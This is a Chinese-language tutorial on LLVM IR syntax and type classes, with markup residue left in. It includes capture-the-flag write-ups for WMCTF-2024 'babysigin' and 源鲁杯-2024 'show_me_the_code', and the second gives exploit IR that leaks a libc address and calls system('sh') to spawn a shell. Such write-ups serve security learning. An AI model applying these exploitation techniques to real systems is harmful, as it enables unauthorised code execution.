LLVM IR (LL文件) 深入解析与实战应用<\/h1>

一、LLVM IR基础语法<\/h2>

1.1 变量表示<\/h3>

全局变量<\/strong>：以@<\/code>符号开头，如@global_var<\/code><\/li>

局部变量<\/strong>：以%<\/code>符号开头，如%local_var<\/code><\/li> <\/ul> 1.2 内存分配指令<\/h3> alloca<\/strong>：在当前函数的堆栈帧中分配内存，函数返回时自动释放 %ptr = alloca<\/span> i32<\/span>, align<\/span> 4<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 1.3 数据类型<\/h3> i32<\/strong>：32位(4字节)整数类型<\/li> 对齐(align)<\/strong>：指定内存对齐方式 %var = alloca<\/span> i32<\/span>, align<\/span> 8<\/span> ; 8字节对齐 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> 1.4 内存操作指令<\/h3> load<\/strong>：从内存读取数据 %val = load<\/span> i32<\/span>, i32<\/span>* %ptr, align<\/span> 4<\/span> <\/span><\/span><\/code><\/pre><\/li> store<\/strong>：向内存写入数据 store<\/span> i32<\/span> 42<\/span>, i32<\/span>* %ptr, align<\/span> 4<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ul> 1.5 控制流指令<\/h3> icmp<\/strong>：整数比较，返回布尔值 %cmp = icmp<\/span> eq<\/span> i32<\/span> %a, %b <\/span><\/span><\/code><\/pre><\/li> br<\/strong>：分支跳转 br<\/span> i1<\/span> %cond, label<\/span> %if_true, label<\/span> %if_false <\/span><\/span><\/code><\/pre><\/li> label<\/strong>：代码标签，用于标记基本块 label_name: <\/span><\/span><\/code><\/pre><\/li> <\/ul> 1.6 函数调用<\/h3> call<\/strong>：调用函数 %result = call<\/span> i32<\/span> @func(i32<\/span> %arg) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 二、LLVM IR类型系统<\/h2> 2.1 重要类型类<\/h3> CallInst<\/strong>：表示函数调用指令<\/li> LoadInst<\/strong>：对应LLVM IR中的load指令<\/li> StoreInst<\/strong>：对应LLVM IR中的store指令<\/li> <\/ul> 2.2 类型转换与检查<\/h3> llvm::dyn_cast<\/strong>：动态类型转换和检查 if<\/span> (auto<\/span> *<\/span>load =<\/span> dyn_cast<<\/span>LoadInst><\/span>(value)) { <\/span><\/span> \/\/ 处理LoadInst <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 三、实战案例分析<\/h2> 3.1 WMCTF-2024 babysigin题目分析<\/h3> 3.1.1 关键函数要求<\/h4> WMCTF_WRITE<\/strong>：<\/p> 参数必须通过LoadInst传递<\/li> 参数必须是全局变量<\/li> 正确示例： @cmd = dso_local<\/span> global<\/span> i32<\/span> 34952<\/span>, align<\/span> 4<\/span> <\/span><\/span>%1 = load<\/span> i32<\/span>, i32<\/span>* @cmd, align<\/span> 4<\/span> <\/span><\/span>call<\/span> void<\/span> @WMCTF_WRITE(i32<\/span> no<\/span>undef<\/span> %1) <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> WMCTF_OPEN<\/strong>：<\/p> 参数必须是LoadInst类型<\/li> 参数名必须包含".addr"<\/li> 需要通过多层函数调用传递<\/li> <\/ul> <\/li> <\/ol> 3.1.2 解决方案<\/h4> char<\/span> *<\/span>filename =<\/span> ".\/flag"<\/span>; <\/span><\/span>char<\/span> *<\/span>flag =<\/span> ".\/flag"<\/span>; <\/span><\/span>int<\/span> cmd =<\/span> 0x8888<\/span>; <\/span><\/span> <\/span><\/span>void<\/span> func0<\/span>(char<\/span> *<\/span>name) { <\/span><\/span> WMCTF_OPEN(filename); <\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> func1<\/span>(char<\/span> *<\/span>name) { <\/span><\/span> func0(filename); <\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> func2<\/span>(char<\/span> *<\/span>name) { <\/span><\/span> func1(filename); <\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> func3<\/span>(char<\/span> *<\/span>name) { <\/span><\/span> func2(filename); <\/span><\/span>} <\/span><\/span> <\/span><\/span>void<\/span> func4<\/span>(char<\/span> *<\/span>name) { <\/span><\/span> flag =<\/span> ".\/flag"<\/span>; <\/span><\/span> func3(flag); <\/span><\/span>} <\/span><\/span><\/code><\/pre>对应的LLVM IR关键部分：<\/p> @.str = private<\/span> unnamed_addr<\/span> constant<\/span> [7<\/span> x<\/span> i8<\/span>] c<\/span>".\/flag\00"<\/span>, align<\/span> 1<\/span> <\/span><\/span>@.addr = dso_local<\/span> global<\/span> i8<\/span>* getelementptr<\/span> inbounds<\/span> ([7<\/span> x<\/span> i8<\/span>], [7<\/span> x<\/span> i8<\/span>]* @.str, i32<\/span> 0<\/span>, i32<\/span> 0<\/span>), align<\/span> 8<\/span> <\/span><\/span> <\/span><\/span>define<\/span> dso_local<\/span> void<\/span> @func0(i8<\/span>* no<\/span>undef<\/span> %0) { <\/span><\/span> %2 = alloca<\/span> i8<\/span>*, align<\/span> 8<\/span> <\/span><\/span> store<\/span> i8<\/span>* %0, i8<\/span>** %2, align<\/span> 8<\/span> <\/span><\/span> %3 = load<\/span> i8<\/span>*, i8<\/span>** @.addr, align<\/span> 8<\/span> <\/span><\/span> call<\/span> void<\/span> @WMCTF_OPEN(i8<\/span>* no<\/span>undef<\/span> %3) <\/span><\/span> ret<\/span> void<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>3.2 源鲁杯-2024 show_me_the_code题目分析<\/h3> 3.2.1 关键结构体<\/h4> class<\/span> edoc<\/span> { <\/span><\/span>public<\/span>:<\/span> <\/span><\/span> void<\/span> addi(unsigned<\/span> char<\/span> x, int<\/span> y, int<\/span> z); \/\/ regs[x] = y + z <\/span><\/span><\/span><\/span> void<\/span> chgr<\/span>(unsigned<\/span> char<\/span> x, int<\/span> y); \/\/ regs[x] += y (一次性) <\/span><\/span><\/span><\/span> void<\/span> sftr<\/span>(unsigned<\/span> char<\/span> x, bool<\/span> y, unsigned<\/span> char<\/span> z); \/\/ 移位操作 <\/span><\/span><\/span><\/span> void<\/span> borr<\/span>(unsigned<\/span> char<\/span> x, unsigned<\/span> char<\/span> y, unsigned<\/span> char<\/span> z); \/\/ 位或操作 <\/span><\/span><\/span><\/span> void<\/span> movr<\/span>(unsigned<\/span> char<\/span> x, unsigned<\/span> char<\/span> y); \/\/ 寄存器移动 <\/span><\/span><\/span><\/span> void<\/span> save<\/span>(unsigned<\/span> char<\/span> x, unsigned<\/span> int<\/span> y); \/\/ 内存存储 <\/span><\/span><\/span><\/span> void<\/span> load<\/span>(unsigned<\/span> char<\/span> x, unsigned<\/span> int<\/span> y); \/\/ 内存加载 <\/span><\/span><\/span><\/span> void<\/span> runc<\/span>(unsigned<\/span> char<\/span> x, unsigned<\/span> int<\/span> y); \/\/ 函数调用 <\/span><\/span><\/span><\/span>}; <\/span><\/span><\/code><\/pre>3.2.2 利用思路<\/h4> 使用movr<\/code>控制reg[6]<\/code>(mmap地址)<\/li> 使用load<\/code>实现任意地址读取<\/li> 通过移位和算术运算计算system地址<\/li> 使用runc<\/code>执行system("sh")<\/li> <\/ol> 3.2.3 完整利用代码<\/h4> define<\/span> dso_local<\/span> void<\/span> @_Z10c0deVmMainv() { <\/span><\/span> ; ... (初始化操作) <\/span><\/span><\/span><\/span> <\/span><\/span> ; 获取__cxa_atexit地址 <\/span><\/span><\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4loadEhj(%class.edoc* %9, i8<\/span> signext<\/span> 2<\/span>, i32<\/span> 104<\/span>) <\/span><\/span> <\/span><\/span> ; 计算system地址 <\/span><\/span><\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4sftrEhbh(%class.edoc* %11, i8<\/span> signext<\/span> 2<\/span>, i1<\/span> zeroext<\/span> true<\/span>, i8<\/span> signext<\/span> 44<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4sftrEhbh(%class.edoc* %12, i8<\/span> signext<\/span> 2<\/span>, i1<\/span> zeroext<\/span> false<\/span>, i8<\/span> signext<\/span> 44<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4sftrEhbh(%class.edoc* %13, i8<\/span> signext<\/span> 2<\/span>, i1<\/span> zeroext<\/span> false<\/span>, i8<\/span> signext<\/span> 12<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4chgrEhi(%class.edoc* %14, i8<\/span> signext<\/span> 2<\/span>, i32<\/span> 11<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4sftrEhbh(%class.edoc* %15, i8<\/span> signext<\/span> 2<\/span>, i1<\/span> zeroext<\/span> true<\/span>, i8<\/span> signext<\/span> 12<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4addiEhii(%class.edoc* %16, i8<\/span> signext<\/span> 3<\/span>, i32<\/span> 3440<\/span>, i32<\/span> 0<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4borrEhhh(%class.edoc* %17, i8<\/span> signext<\/span> 2<\/span>, i8<\/span> signext<\/span> 2<\/span>, i8<\/span> signext<\/span> 3<\/span>) <\/span><\/span> <\/span><\/span> ; 准备调用system("sh") <\/span><\/span><\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4saveEhj(%class.edoc* %23, i8<\/span> signext<\/span> 4<\/span>, i32<\/span> 0<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4addiEhii(%class.edoc* %24, i8<\/span> signext<\/span> 5<\/span>, i32<\/span> 26739<\/span>, i32<\/span> 0<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4saveEhj(%class.edoc* %25, i8<\/span> signext<\/span> 5<\/span>, i32<\/span> 8<\/span>) <\/span><\/span> call<\/span> void<\/span> @_ZN4edoc4runcEhj(%class.edoc* %28, i8<\/span> signext<\/span> 0<\/span>, i32<\/span> 0<\/span>) <\/span><\/span> <\/span><\/span> ret<\/span> void<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre>四、调试与分析技巧<\/h2> 动态调试<\/strong>：<\/p> 使用gdb调试LLVM IR生成的程序<\/li> 关键断点设置：b *$rebase(0x1417)<\/code><\/li> <\/ul> <\/li> 逆向分析<\/strong>：<\/p> 使用IDA Pro分析LLVM IR生成的二进制<\/li> 关注关键函数调用和类型检查<\/li> <\/ul> <\/li> LLVM IR生成<\/strong>：<\/p> clang -emit-llvm -S test.c -o test.ll <\/span><\/span>opt -load .\/WMCTF.so -WMCTF -enable-new-pm=<\/span>0<\/span> .\/test.ll <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、常见问题与解决方案<\/h2> LoadInst要求<\/strong>：<\/p> 问题：直接传递常量不满足LoadInst要求<\/li> 解决：先定义全局变量再传递 int<\/span> cmd =<\/span> 0x8888<\/span>; <\/span><\/span>WMCTF_WRITE(cmd); \/\/ 正确 <\/span><\/span><\/span><\/span>WMCTF_WRITE(0x8888<\/span>); \/\/ 错误 <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 结构体名称检查<\/strong>：<\/p> 问题：需要特定结构体名称(如class.edoc)<\/li> 解决：修改LLVM IR中的类型定义 %class.edoc = type<\/span> { i32<\/span> } ; 替换所有struct.opcode <\/span><\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> 递归调用深度<\/strong>：<\/p> 问题：WMCTF_OPEN需要特定调用深度<\/li> 解决：设计多层包装函数 void<\/span> func3<\/span>() { func2(); } <\/span><\/span>void<\/span> func2<\/span>() { func1(); } <\/span><\/span>void<\/span> func1<\/span>() { WMCTF_OPEN(); } <\/span><\/span><\/code><\/pre><\/li> <\/ul> <\/li> <\/ol> 六、总结与最佳实践<\/h2> LLVM IR编程要点<\/strong>：<\/p> 明确区分全局和局部变量<\/li> 注意内存操作必须通过load\/store<\/li> 理解类型系统的严格检查<\/li> <\/ul> <\/li> CTF挑战技巧<\/strong>：<\/p> 动态调试获取关键数据(如vmkey)<\/li> 仔细分析类型检查逻辑<\/li> 必要时手动修改LLVM IR<\/li> <\/ul> <\/li> 性能考虑<\/strong>：<\/p> 合理使用对齐(align)提升内存访问效率<\/li> 减少不必要的类型转换<\/li> 优化控制流结构<\/li> <\/ul> <\/li> <\/ol> 通过深入理解LLVM IR的语法和类型系统，结合实战中的调试和分析技巧，可以有效解决基于LLVM的各类逆向和漏洞利用挑战。关键是要掌握LLVM IR与高级语言之间的对应关系，以及LLVM严格的类型检查机制。<\/p>